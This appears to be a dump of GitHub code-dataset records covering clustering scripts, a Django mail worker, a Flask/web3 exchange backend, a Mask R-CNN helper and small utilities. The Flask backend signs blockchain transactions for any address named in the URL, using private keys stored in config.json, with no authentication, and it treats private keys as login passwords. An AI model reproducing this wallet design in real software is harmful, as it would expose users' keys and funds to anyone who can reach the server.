dataset\nscaler1_df = scaler1.fit_transform(data1)\nprint(scaler1_df)\nprint('\\n')\nscaler2_df = scaler2.fit_transform(data1)\nprint(scaler2_df)\n\n\n# In[27]:\n\n\n# Create dendrograms\nplt.figure(figsize=(10, 7)) \ndendrograms=sch.dendrogram(sch.linkage(scaler1_df,'complete'))\n\n\n# In[28]:\n\n\n# Creating clusters\nH_clusters=AgglomerativeClustering(n_clusters=5,affinity='euclidean',linkage='ward')\nH_clusters\n\n\n# In[29]:\n\n\n\n# Using data normalized by MinMaxScaler \ny=pd.DataFrame(H_clusters.fit_predict(scaler1_df),columns=['clustersid'])\ny['clustersid'].value_counts()\n\n\n# In[31]:\n\n\n# Adding clusters to the dataset\ndata['clustersid_s1']=H_clusters.labels_\ndata\n\n\n# In[32]:\n\n\ndata1['clustersid_s1']=H_clusters.labels_\n\n\n# In[35]:\n\n\n\n# Bar plot (via groupby) of how many records fall in each cluster\nfig, ax = plt.subplots(figsize=(10, 6))\ndata.groupby(['clustersid_s1']).count()['ID#'].plot(kind='bar')\nplt.ylabel('ID Counts')\nplt.title('Hierarchical Clustering',fontsize='large',fontweight='bold')\nax.set_xlabel('Clusters', fontsize='large', fontweight='bold')\nax.set_ylabel('ID#', fontsize='large', fontweight='bold')\nplt.yticks(fontsize=15)\nplt.xticks(fontsize=15)\nplt.show()\n\n\n# In[36]:\n\n\n# silhouette_score of AgglomerativeClustering\nfrom sklearn.metrics import silhouette_score\n\n\n# In[37]:\n\n\nsil_score= silhouette_score(scaler1_df, H_clusters.labels_)\nsil_score\n\n\n# In[38]:\n\n\n# Using data normalized by StandardScaler\ny=pd.DataFrame(H_clusters.fit_predict(scaler2_df),columns=['clustersid'])\ny['clustersid'].value_counts()\n\n\n# In[39]:\n\n\n# Adding clusters to the dataset\ndata['clustersid_s2']=H_clusters.labels_\ndata1['clustersid_s2']=H_clusters.labels_\n\n\n# In[40]:\n\n\ndata\n\n\n# In[42]:\n\n\n# Bar plot (via groupby) of how many records fall in each cluster\n
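# clustersid_s2 below reflects the StandardScaler-normalized features.\n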
fig, ax = plt.subplots(figsize=(10, 6))\ndata.groupby(['clustersid_s2']).count()['ID#'].plot(kind='bar')\nplt.ylabel('ID Counts')\nplt.title('Hierarchical Clustering',fontsize='large',fontweight='bold')\nax.set_xlabel('Clusters', fontsize='large', fontweight='bold')\nax.set_ylabel('ID counts', fontsize='large', fontweight='bold')\nplt.yticks(fontsize=15)\nplt.xticks(fontsize=15)\nplt.show()\n\n\n# In[43]:\n\n\n# K-MEANS Clustering\nfrom sklearn.cluster import KMeans\n\n\n# In[44]:\n\n\nscaler1 = MinMaxScaler()\nscaler2 = StandardScaler()\n\n\n# In[48]:\n\n\n# Normalizing the dataset\nscaler1_df = scaler1.fit_transform(data1)\nprint(scaler1_df)\n\nprint('\\n')\n\nscaler2_df = scaler2.fit_transform(data1)\nprint(scaler2_df)\n\n\n# In[50]:\n\n\n# Using data normalized by MinMaxScaler\nwcss = []\nfor i in range(1, 11):\n    kmeans = KMeans(n_clusters=i,random_state=0)\n    kmeans.fit(scaler1_df)\n    wcss.append(kmeans.inertia_)\n    \nplt.plot(range(1, 11), wcss)\nplt.title('Elbow Method')\nplt.xlabel('Number of clusters')\nplt.ylabel('WCSS')\nplt.show()\n\n\n# In[51]:\n\n\n# Using data normalized by StandardScaler\nwcss = []\nfor i in range(1, 11):\n    kmeans = KMeans(n_clusters=i,random_state=0)\n    kmeans.fit(scaler2_df)\n    wcss.append(kmeans.inertia_)\n    \nplt.plot(range(1, 11), wcss)\nplt.title('Elbow Method')\nplt.xlabel('Number of clusters')\nplt.ylabel('WCSS')\nplt.show()\n\n\n# In[52]:\n\n\n# Build the cluster algorithm\n\n# Using data normalized by MinMaxScaler\nclusters_new1 = KMeans(5, random_state=42)\nclusters_new1.fit(scaler1_df)\n\n\n# In[53]:\n\n\nsil_score= silhouette_score(scaler1_df, clusters_new1.labels_)\nprint('Silhouette Score for data normalized by MinMaxScaler: ',sil_score)\n\n\n# In[54]:\n\n\n# Using data normalized by StandardScaler\nclusters_new2 = KMeans(5, random_state=42)\nclusters_new2.fit(scaler2_df)\n\n\n# In[55]:\n\n\n\nsil_score= silhouette_score(scaler2_df, clusters_new2.labels_)\nprint('Silhouette Score for data normalized by StandardScaler: ',sil_score)\n\n\n# In[56]:\n\n\n# Assign clusters to the data set\ndata['clusterid_Kmeans'] = clusters_new1.labels_\ndata1['clusterid_Kmeans'] = clusters_new1.labels_\n\n\n# In[57]:\n\n\n\ny=pd.DataFrame(clusters_new1.fit_predict(scaler1_df),columns=['clusterid_Kmeans'])\ny['clusterid_Kmeans'].value_counts()\n\n\n# In[59]:\n\n\n# Bar plot (via groupby) of how many records fall in each cluster\n
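# The choice of 5 clusters follows the elbow plots above.\n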
in each cluster\n# Plotting barplot using groupby method to get visualization of how many row no. in each cluster\nfig, ax = plt.subplots(figsize=(10, 6))\ndata.groupby(['clusterid_DBSCAN']).count()['ID#'].plot(kind='bar')\nplt.ylabel('ID Counts')\nplt.title('Hierarchical Clustering',fontsize='large',fontweight='bold')\nax.set_xlabel('Clusters', fontsize='large', fontweight='bold')\nax.set_ylabel('ID counts', fontsize='large', fontweight='bold')\nplt.yticks(fontsize=15)\nplt.xticks(fontsize=15)\nplt.show()\n\n\n# In[72]:\n\n\n# for epsilon = 0.8\ndbscan1 = DBSCAN(eps=0.8, min_samples=12)\ndbscan1.fit(scaler1_df)\n\n\n# In[73]:\n\n\ny=pd.DataFrame(dbscan1.fit_predict(scaler1_df),columns=['clusterid_DBSCAN'])\nprint(y['clusterid_DBSCAN'].value_counts())\n\n\n# In[74]:\n\n\n#silhouette score\nsil_score= silhouette_score(scaler1_df, dbscan1.labels_)\nprint('silhouette score: ',sil_score)\n\n\n# In[76]:\n\n\n\n# for epsilon = 0.6\ndbscan2 = DBSCAN(eps=0.6, min_samples=12)\ndbscan2.fit(scaler1_df)\n\ny=pd.DataFrame(dbscan2.fit_predict(scaler1_df),columns=['clusterid_DBSCAN'])\nprint(y['clusterid_DBSCAN'].value_counts())\n\n\n# In[77]:\n\n\n# for epsilon = 0.5\ndbscan3 = DBSCAN(eps=0.5, min_samples=12)\ndbscan3.fit(scaler1_df)\n\n\n# In[78]:\n\n\ndbscan4 = DBSCAN(eps=0.55, min_samples=12)\ndbscan4.fit(scaler1_df)\n\ny=pd.DataFrame(dbscan4.fit_predict(scaler1_df),columns=['clusterid_DBSCAN'])\nprint(y['clusterid_DBSCAN'].value_counts())\n\n\n# In[79]:\n\n\n\n# silhouette score\nsil_score= silhouette_score(scaler1_df, dbscan4.labels_)\nprint('silhouette score: ',sil_score)\n\n\n# In[80]:\n\n\n# shows the noisy data points\ndata['clusterid_DBSCAN'] = dbscan4.labels_\ndata1['clusterid_DBSCAN'] = dbscan4.labels_\n\n\n# In[81]:\n\n\ndata.head()\n\n\n# In[83]:\n\n\n# Plotting barplot using groupby method to get visualization of how many row no. 
fig, ax = plt.subplots(figsize=(10, 6))\ndata.groupby(['clusterid_DBSCAN']).count()['ID#'].plot(kind='bar')\nplt.ylabel('ID Counts')\nplt.title('DBSCAN Clustering',fontsize='large',fontweight='bold')\nax.set_xlabel('Clusters', fontsize='large', fontweight='bold')\nax.set_ylabel('ID counts', fontsize='large', fontweight='bold')\nplt.yticks(fontsize=15)\nplt.xticks(fontsize=15)\nplt.show()\n\n\n# In[84]:\n\n\ndata1.groupby('clusterid_DBSCAN').agg(['mean']).reset_index()\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"Nalinitak/Datasciencepython","sub_path":"Assinment 7 clustring airline dataset.py","file_name":"Assinment 7 clustring airline dataset.py","file_ext":"py","file_size_in_byte":8924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
{"seq_id":"25278557460","text":"import logging\n\nfrom django_gearman_commands import GearmanWorkerBaseCommand\n\nimport django_gearman_proxy.settings\nfrom django_gearman_proxy import load_object\n\n\nlog = logging.getLogger(__name__)\n\n\nUNSERIALIZER = load_object(django_gearman_proxy.settings.GEARMAN_EMAIL_UNSERIALIZER)\n\n\nclass Command(GearmanWorkerBaseCommand):\n\n    @property\n    def task_name(self):\n        return 'send_mail'\n\n    def do_job(self, job_data):\n        to_return = False\n        try:\n            email_message = UNSERIALIZER(job_data)\n            log.info('Sending mail message to \"%s\"', email_message.to)\n            to_return = email_message.send()\n        except Exception:\n            log.exception('Error while sending mail message with data: %s', job_data)\n        return to_return","repo_name":"char0n/django-gearman-proxy","sub_path":"django_gearman_proxy/management/commands/send_mail.py","file_name":"send_mail.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"}
{"seq_id":"6347808800","text":"from flask import Flask, request\nfrom web3 import HTTPProvider, Web3\nimport json\nfrom flask import jsonify\nfrom flask_cors import CORS, cross_origin\n\napp = Flask(__name__)\nCORS(app, support_credentials=True)\n\n\ndef web3_get_account(account_addr):\n    return get_web3().eth.account.privateKeyToAccount(priv_key(account_addr))\n\n\ndef name_by_account(w3_account):\n    accounts = user_accounts()\n    for acc in accounts.items():\n        if acc[1][\"address\"] == w3_account.address:\n            return acc[0]\n    return None\n\n\ndef priv_key(account_addr):\n    accounts = user_accounts()\n    for acc in accounts.items():\n        if acc[1][\"address\"] == account_addr:\n            return acc[1][\"key\"]\n    return None\n\n\ndef user_accounts():\n    with open('config.json') as accounts_file:\n        return json.load(accounts_file)\n\n\ndef get_web3():\n    return Web3(Web3.HTTPProvider(\"http://localhost:8545\"))\n\n\ndef contract_info(contract_name):\n    global contract_addresses\n    with open(f\"contracts/{contract_name}/{contract_name}.abi\") as abi_file:\n        abi = json.loads(abi_file.read())\n    return contract_addresses[contract_name], abi\n\n\ndef user_balances(w3_account):\n    eth_balance = dict()\n    eth_balance['ticker'] = \"ETH\"\n    eth_balance['balance'] = int(get_web3().eth.getBalance(w3_account.address)) / 1000000000000000000\n    return [eth_balance]\n\n\ndef deploy(name_contract):\n    w3 = Web3(HTTPProvider(\"http://127.0.0.1:8545\"))\n    global wallet_addr\n    global contract_addresses\n    with open(f\"contracts/{name_contract}/{name_contract}.abi\") as abi_file:\n        abi = json.loads(abi_file.read())\n    with open(f\"contracts/{name_contract}/{name_contract}.bin\") as bin_file:\n        bytecode = json.loads(bin_file.read())\n    
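# The first account listed in config.json signs and pays for every deployment.\n    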
p_key = next(iter(user_accounts().values()))[\"key\"]\n    w3.eth.account = w3.eth.account.privateKeyToAccount(p_key)\n    current_contract = w3.eth.contract(abi=abi, bytecode=bytecode[\"object\"])\n    transact_id = None\n    if name_contract == \"Token\":\n        transact_id = current_contract.constructor(1000, \"Token\", \"TKN\", 10, w3.eth.account.address).transact({'from': w3.eth.account.address})\n    elif name_contract == \"Account\":\n        transact_id = current_contract.constructor().transact({'from': w3.eth.account.address})\n    elif name_contract == \"Engine\":\n        transact_id = current_contract.constructor(wallet_addr).transact({'from': w3.eth.account.address})\n    transact_receipt = w3.eth.waitForTransactionReceipt(transact_id)\n    if transact_receipt['status']:\n        print(f\"Contract {name_contract} deployed successfully at address: \" + transact_receipt['contractAddress'])\n        contract_addresses[name_contract] = transact_receipt['contractAddress']\n        if name_contract == \"Account\":\n            wallet_addr = transact_receipt['contractAddress']\n\n\ncontract_addresses = {}\ntokens_db = {}\nwallet_addr = ''\ndeploy('Token')\ndeploy('Account')\ndeploy('Engine')\n\n\n@app.route('/<account_address>/account/profile_coins', methods=['GET', 'POST'])\n@cross_origin(supports_credentials=True)\ndef coins_profile(account_address):\n    w3 = get_web3()\n    w3_account = web3_get_account(account_address)\n    w3.eth.defaultAccount = w3_account\n    address, abi = contract_info(\"Account\")\n    contract = w3.eth.contract(address=address, abi=abi)\n    name = name_by_account(w3_account)\n    message = 'Success'\n    try:\n        contract.functions.eth_balanceOf(w3_account.address).call({'from': w3_account.address}) / 1000000000000000000\n    except Exception as e:\n        message = e\n    response = dict()\n    response['address'] = account_address\n    response['alias'] = name\n    response['message'] = message\n    return jsonify(response)\n\n\n@app.route('/<account_address>/account/profile_coins/create_token', methods=['GET', 'POST'])\n@cross_origin(supports_credentials=True)\ndef create_token(account_address):\n    global tokens_db\n    w3 = get_web3()\n    w3_account = web3_get_account(account_address)\n    w3.eth.defaultAccount = w3_account\n    address, abi = contract_info(\"Account\")\n    name = name_by_account(w3_account)\n    contract = w3.eth.contract(address=address, abi=abi)\n    if request.method == \"POST\":\n        total_supply = request.json['tot']\n        name = request.json['name']\n        symbol = request.json['sym']\n        decimals = request.json['dec']\n        hash_transaction = contract.functions.createToken(w3_account.address, int(total_supply), name, symbol, int(decimals)).transact({'from': w3_account.address})\n        w3.eth.waitForTransactionReceipt(hash_transaction)\n        token_addr = contract.functions.getAddr().call({'from': w3_account.address})\n        tokens_db[symbol] = token_addr\n    response = dict()\n    response['address'] = account_address\n    response['alias'] = name\n    return jsonify(response)\n\n\n@app.route('/<account_address>/account/eth_management/send_eth', methods=['GET', 'POST'])\n@cross_origin(supports_credentials=True)\ndef send_ethereum(account_address):\n    w3 = get_web3()\n    w3_account = web3_get_account(account_address)\n    w3.eth.defaultAccount = w3_account\n    address, abi = contract_info(\"Account\")\n    name = name_by_account(w3_account)\n    contract = w3.eth.contract(address=address, abi=abi)\n    message = ''\n    if request.method == \"POST\":\n        receiver = request.json['rec']\n        amount = request.json['amo']\n        try:\n            hash_transaction = contract.functions.send_eth(w3_account.address, receiver, int(float(amount) * 1000000000000000000)).transact({'from': w3_account.address})\n            
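# waitForTransactionReceipt polls until the transfer is mined (or raises on timeout).\n            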
w3.eth.waitForTransactionReceipt(hash_transaction)\n        except Exception as e:\n            message = e\n    response = dict()\n    response['address'] = account_address\n    response['alias'] = name\n    response['message'] = message\n    return jsonify(response)\n\n\n@app.route('/<account_address>/account/profile_coins/available_coins', methods=['GET', 'POST'])\n@cross_origin(supports_credentials=True)\ndef coins_available(account_address):\n    global tokens_db\n    w3 = get_web3()\n    w3_account = web3_get_account(account_address)\n    w3.eth.defaultAccount = w3_account\n    address, abi = contract_info(\"Account\")\n    contract = w3.eth.contract(address=address, abi=abi)\n    name = name_by_account(w3_account)\n    tickers = list()\n    balances = []\n    for sym, tok_address in tokens_db.items():\n        token_balance = contract.functions.token_balanceOf(w3_account.address, tok_address).call({'from': w3_account.address})\n        balances.append(token_balance)\n        coin = dict()\n        coin['ticker'] = sym\n        coin['address'] = tok_address\n        coin['balance'] = token_balance\n        tickers.append(coin)\n    response = dict()\n    response['address'] = account_address\n    response['tickers'] = tickers\n    response['alias'] = name\n    return jsonify(response)\n\n\n@app.route('/<account_address>/account/profile_coins/view_dom/<token>', methods=['GET'])\n@cross_origin(supports_credentials=True)\ndef get_dom(account_address, token):\n    global tokens_db\n    w3 = get_web3()\n    w3_account = web3_get_account(account_address)\n    w3.eth.defaultAccount = w3_account\n    address, abi = contract_info(\"Engine\")\n    contract = w3.eth.contract(address=address, abi=abi)\n    message = ''\n    token_addr = tokens_db[token]\n    buy_ord = contract.functions.getBuyOrders(token_addr).call({'from': w3_account.address})\n    sell_ord = contract.functions.getSellOrders(token_addr).call({'from': w3_account.address})\n    name = name_by_account(w3_account)\n    response = dict()\n    response['address'] = account_address\n    response['message'] = message\n    response['token'] = token\n    response['alias'] = name\n    response['buyOrders'] = buy_ord\n    response['sellOrders'] = sell_ord\n    return jsonify(response)\n\n\n@app.route('/<account_address>/account/profile_coins/remove_order/<token>', methods=['GET', 'POST'])\n@cross_origin(supports_credentials=True)\ndef remove_order(account_address, token):\n    w3 = get_web3()\n    w3_account = web3_get_account(account_address)\n    w3.eth.defaultAccount = w3_account\n    address, abi = contract_info(\"Engine\")\n    contract = w3.eth.contract(address=address, abi=abi)\n    message = ''\n    if request.method == 'POST':\n        global tokens_db\n        token_addr = tokens_db[token]\n        sell_order = request.json['sell']\n        sell_order = True if sell_order == \"sell\" else False\n        price = request.json['pri']\n        hash_transaction = contract.functions.removeOrder(w3_account.address, token_addr, sell_order, int(price) * 1000000000000000000).transact({'from': w3_account.address})\n        w3.eth.waitForTransactionReceipt(hash_transaction)\n    name = name_by_account(w3_account)\n    response = dict()\n    response['address'] = account_address\n    response['message'] = message\n    response['token'] = token\n    response['alias'] = name\n    return jsonify(response)\n\n\n@app.route('/<account_address>/account/profile_coins/send_token', methods=['GET', 'POST'])\n@cross_origin(supports_credentials=True)\ndef token_snd(account_address):\n    global tokens_db\n    w3 = get_web3()\n    w3_account = web3_get_account(account_address)\n    w3.eth.defaultAccount = w3_account\n    address, abi = contract_info(\"Account\")\n    contract = w3.eth.contract(address=address, abi=abi)\n    message = ''\n    if request.method == \"POST\":\n        receiver = request.json['rec']\n        
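# 'rec', 'amo' and 'tic' are the JSON field names the frontend posts.\n        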
amount = request.json['amo']\n        token_addr = tokens_db[request.json['tic']]\n        hash_transaction = contract.functions.send_token(w3_account.address, receiver, token_addr, int(amount)).transact({'from': w3_account.address})\n        w3.eth.waitForTransactionReceipt(hash_transaction)\n    name = name_by_account(w3_account)\n    response = dict()\n    response['address'] = account_address\n    response['message'] = message\n    response['alias'] = name\n    return jsonify(response)\n\n\n@app.route('/<account_address>/account/profile_coins/sell_token/<token>', methods=['GET', 'POST'])\n@cross_origin(supports_credentials=True)\ndef token_sell(account_address, token):\n    global tokens_db\n    w3 = get_web3()\n    w3_account = web3_get_account(account_address)\n    w3.eth.defaultAccount = w3_account\n    address, abi = contract_info(\"Engine\")\n    contract = w3.eth.contract(address=address, abi=abi)\n    message = ''\n    if request.method == \"POST\":\n        price = request.json['pri']\n        amount = request.json['amo']\n        token_addr = tokens_db[token]\n        hash_transaction = contract.functions.sellOffer(w3_account.address, token_addr, int(float(price) * 1000000000000000000), int(amount)).transact({'from': w3_account.address})\n        w3.eth.waitForTransactionReceipt(hash_transaction)\n    name = name_by_account(w3_account)\n    response = dict()\n    response['address'] = account_address\n    response['message'] = message\n    response['alias'] = name\n    response['token'] = token\n    return jsonify(response)\n\n\n@app.route('/<account_address>/account/profile_coins/buy_token/<token>', methods=['GET', 'POST'])\n@cross_origin(supports_credentials=True)\ndef wallet_buy_token(account_address, token):\n    global tokens_db\n    w3 = get_web3()\n    w3_account = web3_get_account(account_address)\n    w3.eth.defaultAccount = w3_account\n    address, abi = contract_info(\"Engine\")\n    contract = w3.eth.contract(address=address, abi=abi)\n    message = ''\n    if request.method == \"POST\":\n        price = request.json['pri']\n        amount = request.json['amo']\n        token_addr = tokens_db[token]\n        hash_transaction = contract.functions.buyOffer(w3_account.address, token_addr, int(float(price) * 1000000000000000000), int(amount)).transact({'from': w3_account.address})\n        w3.eth.waitForTransactionReceipt(hash_transaction)\n    name = name_by_account(w3_account)\n    response = dict()\n    response['address'] = account_address\n    response['message'] = message\n    response['alias'] = name\n    response['token'] = token\n    return jsonify(response)\n\n\n@app.route('/check_pass', methods=['POST'])\n@cross_origin(supports_credentials=True)\ndef check_pass():\n    address = request.json['address']\n    password = request.json['key']\n    found = False\n    db = user_accounts()\n    for user in db:\n        if db[user][\"address\"] == address and db[user][\"key\"] == password:\n            found = True\n    response = dict()\n    response['status'] = found\n    return jsonify(response)\n\n\n@app.route('/<account_address>')\n@cross_origin(supports_credentials=True)\ndef get_specific_account(account_address):\n    w3_account = web3_get_account(account_address)\n    name = name_by_account(w3_account)\n    balances = user_balances(w3_account)\n    response = dict()\n    response['address'] = w3_account.address\n    response['balances'] = balances\n    response['alias'] = name\n    return jsonify(response)\n\n\n@app.route('/<account_address>/account')\n@cross_origin(supports_credentials=True)\ndef account_wall(account_address):\n    w3_account = web3_get_account(account_address)\n    name = name_by_account(w3_account)\n    response = dict()\n    response['alias'] = name\n    response['address'] = w3_account.address\n    return response\n\n\n
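# The route below is GET-only (no methods list), so visiting the URL once provisions the wallet.\n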
@app.route('/<account_address>/account/create_wallet')\n@cross_origin(supports_credentials=True)\ndef new_wallet(account_address):\n    w3 = get_web3()\n    w3_account = web3_get_account(account_address)\n    name = name_by_account(w3_account)\n    w3.eth.defaultAccount = w3_account\n    address, abi = contract_info(\"Account\")\n    contract = w3.eth.contract(address=address, abi=abi)\n    hash_transaction = contract.functions.create_wallet(w3_account.address).transact({'from': w3_account.address})\n    tx_receipt = w3.eth.waitForTransactionReceipt(hash_transaction)\n    if tx_receipt['status']:\n        message = 'Wallet is created!'\n    else:\n        message = \"Fail\"\n    response = dict()\n    response['address'] = account_address\n    response['alias'] = name\n    response['message'] = message\n    return jsonify(response)\n\n\n@app.route('/<account_address>/account/eth_management', methods=['GET', 'POST'])\n@cross_origin(supports_credentials=True)\ndef wallet_profile(account_address):\n    w3 = get_web3()\n    w3_account = web3_get_account(account_address)\n    w3.eth.defaultAccount = w3_account\n    address, abi = contract_info(\"Account\")\n    name = name_by_account(w3_account)\n    contract = w3.eth.contract(address=address, abi=abi)\n    try:\n        eth_balance = contract.functions.eth_balanceOf(w3_account.address).call({'from': w3_account.address}) / 1000000000000000000\n        message = ''\n        if request.method == \"POST\":\n            if request.json['dep'] != '':\n                eth = request.json['dep']\n            elif request.json['with'] != '':\n                eth = request.json['with']\n            else:\n                eth = 0\n            value = w3.toWei(float(eth), 'ether')\n            if request.json['dep'] != '':\n                hash_transaction = contract.functions.deposit_eth(w3_account.address).transact({'from': w3_account.address, 'value': value})\n                w3.eth.waitForTransactionReceipt(hash_transaction)\n            elif request.json['with'] != '':\n                try:\n                    hash_transaction = contract.functions.withdraw(w3_account.address, value).transact({'from': w3_account.address})\n                    w3.eth.waitForTransactionReceipt(hash_transaction)\n                except Exception as e:\n                    message = e\n    except Exception as e:\n        eth_balance = 0\n        message = e\n    response = dict()\n    response['balance'] = eth_balance\n    response['address'] = account_address\n    response['alias'] = name\n    response['message'] = message\n    return jsonify(response)\n\n\n@app.route('/')\n@cross_origin(supports_credentials=True)\ndef get_accounts():\n    accounts = user_accounts()\n    addresses = [acc[1][\"address\"] for acc in accounts.items()]\n    names = [acc[0] for acc in accounts.items()]\n    users = list()\n    for i in range(0, len(names)):\n        user = dict()\n        user['id'] = i\n        user['alias'] = names[i]\n        user['address'] = addresses[i]\n        users.append(user)\n    return jsonify(users)\n","repo_name":"Louie-ru/DEX-backend","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":16042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
{"seq_id":"18834062498","text":"from collections import OrderedDict\n\nimport torch\nimport torch.nn.functional as F\n\nfrom torchvision.models.detection import MaskRCNN\nfrom torchvision.models.detection.backbone_utils import resnet_fpn_backbone\nfrom torchvision.models.detection.transform import resize_boxes\nfrom torchvision.models.detection import maskrcnn_resnet50_fpn\nimport pycocotools.mask as cocomask\nimport numpy as np\nimport pdb\nclass MRCNN_FPN():\n\n    def __init__(self):\n        self.model = maskrcnn_resnet50_fpn(pretrained=True)\n        self.model.original_image_sizes = None\n        self.model.preprocessed_images = None\n        self.model.features = None\n\n    def predict_masks(self, boxes, images):\n\n        device = list(self.model.parameters())[0].device\n        boxes = boxes.to(device)\n        images 
= images.to(device)\n\n self.model.original_image_sizes = [img.shape[-2:] for img in images]\n\n preprocessed_images, _ = self.model.transform(images, None)\n self.model.preprocessed_images = preprocessed_images\n\n self.model.features = self.model.backbone(preprocessed_images.tensors)\n if isinstance(self.model.features, torch.Tensor):\n self.model.features = OrderedDict([(0, self.model.features)])\n\n boxes_new = resize_boxes(boxes, self.model.original_image_sizes[0], self.model.preprocessed_images.image_sizes[0])\n proposals = [boxes_new]\n\n mask_features = self.model.roi_heads.mask_roi_pool(self.model.features, proposals, self.model.preprocessed_images.image_sizes)\n\n pred_mask_heads = self.model.roi_heads.mask_head(mask_features)\n pred_masks = self.model.roi_heads.mask_predictor(pred_mask_heads)\n\n preds=[{\"boxes\": boxes_new, \"masks\": pred_masks[:,1:2], \"labels\": torch.tensor([1 for k in pred_masks]),\"scores\": torch.tensor([1. for k in pred_masks])}]\n preds_new= self.model.transform.postprocess(preds, self.model.preprocessed_images.image_sizes, self.model.original_image_sizes)\n pred_masks=preds_new[0][\"masks\"].squeeze(1).permute(1,2,0).detach().cpu().numpy()>0.5\n return cocomask.encode(np.asfortranarray(pred_masks.astype(np.uint8)))\n","repo_name":"AnwesaChoudhuri/AssignmentSpace-MOTS","sub_path":"assignmentspace_mots/utils/mrcnn_fpn.py","file_name":"mrcnn_fpn.py","file_ext":"py","file_size_in_byte":2137,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"} +{"seq_id":"1784611156","text":"#coding=utf-8\n\nimport random\n\ndef bucket_sort(lst):\n \n buckets = [[] for i in range(10)]\n\n for idx, item in enumerate(lst): \n buckets[item].append(item)\n\n return [i for l in buckets for i in l]\n\n\n\nlst = list(range(10)) * 5\nrandom.shuffle(lst)\n\nlst = random.sample(lst, 10)\n\nprint(lst)\nprint(bucket_sort(lst))\n","repo_name":"Provinm/baseCs","sub_path":"Books/Algorithms/Part-1/Chapter-8/bucket_sort.py","file_name":"bucket_sort.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"5781324483","text":"from typing import Union, List\nimport numpy as np\nimport auto_diff as ad\n\n\nclass Model(ad.layers.Layer):\n\n def __init__(self,\n inputs: Union[ad.layers.Input, List[ad.layers.Input]],\n outputs: Union[ad.layers.Layer, List[ad.layers.Layer]],\n **kwargs):\n super(Model, self).__init__(**kwargs)\n self._inputs = inputs\n self._outputs = outputs\n self._optimizer = None\n self._losses = None\n self._loss = None\n self._layers = None\n self._updates = []\n self._output_placeholders = None\n self._session = ad.sess.Session()\n\n def compute_output_shape(self, input_shape):\n if isinstance(self._outputs, list):\n return [output.output_shapes for output in self._outputs]\n return self._outputs.output_shapes\n\n def build(self, optimizer: ad.optims.Optimizer, losses):\n if not self._built:\n self._optimizer = optimizer\n self._losses = losses\n self._layers = {}\n\n def _collect_all_layers(layer):\n if layer is None:\n return\n if layer in self._layers:\n return\n self._layers[layer] = layer\n if isinstance(layer.inputs, list):\n for input_layer in layer.inputs:\n _collect_all_layers(input_layer)\n else:\n _collect_all_layers(layer.inputs)\n\n if isinstance(self.outputs, list):\n for output in self.outputs:\n _collect_all_layers(output)\n else:\n _collect_all_layers(self.outputs)\n\n for layer in self._layers.values():\n 
self._trainable_weights += layer.trainable_weights\n self._non_trainable_weights += layer.non_trainable_weights\n self._updates += layer.updates\n\n self._loss = 0.0\n if isinstance(self.outputs, list):\n self._output_placeholders = []\n for i, output in enumerate(self.outputs):\n output_shapes = output.output_shapes\n if isinstance(output_shapes, list):\n self._output_placeholders.append([])\n for j, output_shape in enumerate(output_shapes):\n output_placeholder = ad.OpPlaceholder(output_shape)\n self._output_placeholders[-1].append(output_placeholder)\n self._loss = self._loss + losses(output_placeholder, self.outputs[i].outputs[j])\n else:\n output_placeholder = ad.OpPlaceholder(output_shapes)\n self._output_placeholders.append(output_placeholder)\n self._loss = self._loss + losses(output_placeholder, self.outputs[i].outputs)\n else:\n output_shapes = self.outputs.output_shapes\n if isinstance(output_shapes, list):\n self._output_placeholders = []\n for i, output_shape in enumerate(output_shapes):\n output_placeholder = ad.OpPlaceholder(output_shape)\n self._output_placeholders.append(output_placeholder)\n self._loss = self._loss + losses(output_placeholder, self.outputs.outputs[i])\n else:\n output_placeholder = ad.OpPlaceholder(output_shapes)\n self._output_placeholders = output_placeholder\n self._loss = self._loss + losses(output_placeholder, self.outputs.outputs)\n\n super(Model, self).build(None)\n\n def call(self, inputs, **kwargs):\n return self.outputs\n\n def fit_on_batch(self,\n x: Union[np.ndarray, List[np.ndarray]],\n y: Union[np.ndarray, List[np.ndarray]]):\n # TODO: Multiple outputs\n feed_dict = {ad.Operation.KEY_TRAINING: True}\n if isinstance(x, list):\n for i, input_val in enumerate(x):\n feed_dict[self._inputs[i].placeholder] = input_val\n else:\n feed_dict[self._inputs.placeholder] = x\n feed_dict[self._output_placeholders] = y\n self._session.prepare()\n self._session.run(self._loss, feed_dict=feed_dict)\n self._loss.backward()\n for var, update in self.updates:\n var.update(update.forward(feed_dict=feed_dict))\n self._optimizer.update(self.trainable_weights, self._session)\n\n def predict_on_batch(self, x: Union[np.ndarray, List[np.ndarray]]) -> Union[np.ndarray, List[np.ndarray]]:\n feed_dict = {ad.Operation.KEY_TRAINING: False}\n if isinstance(x, list):\n for i, input_val in enumerate(x):\n feed_dict[self._inputs[i].placeholder] = input_val\n else:\n feed_dict[self._inputs.placeholder] = x\n self._session.prepare()\n if isinstance(self._outputs, list):\n outputs = [self._session.run(output.outputs, feed_dict=feed_dict) for output in self._outputs]\n else:\n outputs = self._session.run(self._outputs.outputs, feed_dict=feed_dict)\n return outputs\n","repo_name":"CyberZHG/toy-auto-diff","sub_path":"auto_diff/models/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":5262,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"25086720019","text":"import numpy as np\nimport itertools\nfrom heapq import heappush, heappop\nfrom collections import defaultdict\n\nclass Vert:\n def __init__(self, pos, next=None, parent=None):\n self.pos = np.array(pos).copy()\n self.next = next\n self.parent = parent\n self.support = None\n\n def __eq__(self, other):\n if type(other) is tuple:\n return tuple(self.pos) == other\n else:\n return tuple(self.pos) == tuple(other.pos)\n\n def __hash__(self):\n return hash(tuple(self.pos))\n\n\nclass DNDict:\n '''Default dictionary with support for np.ndarray->tuple key 
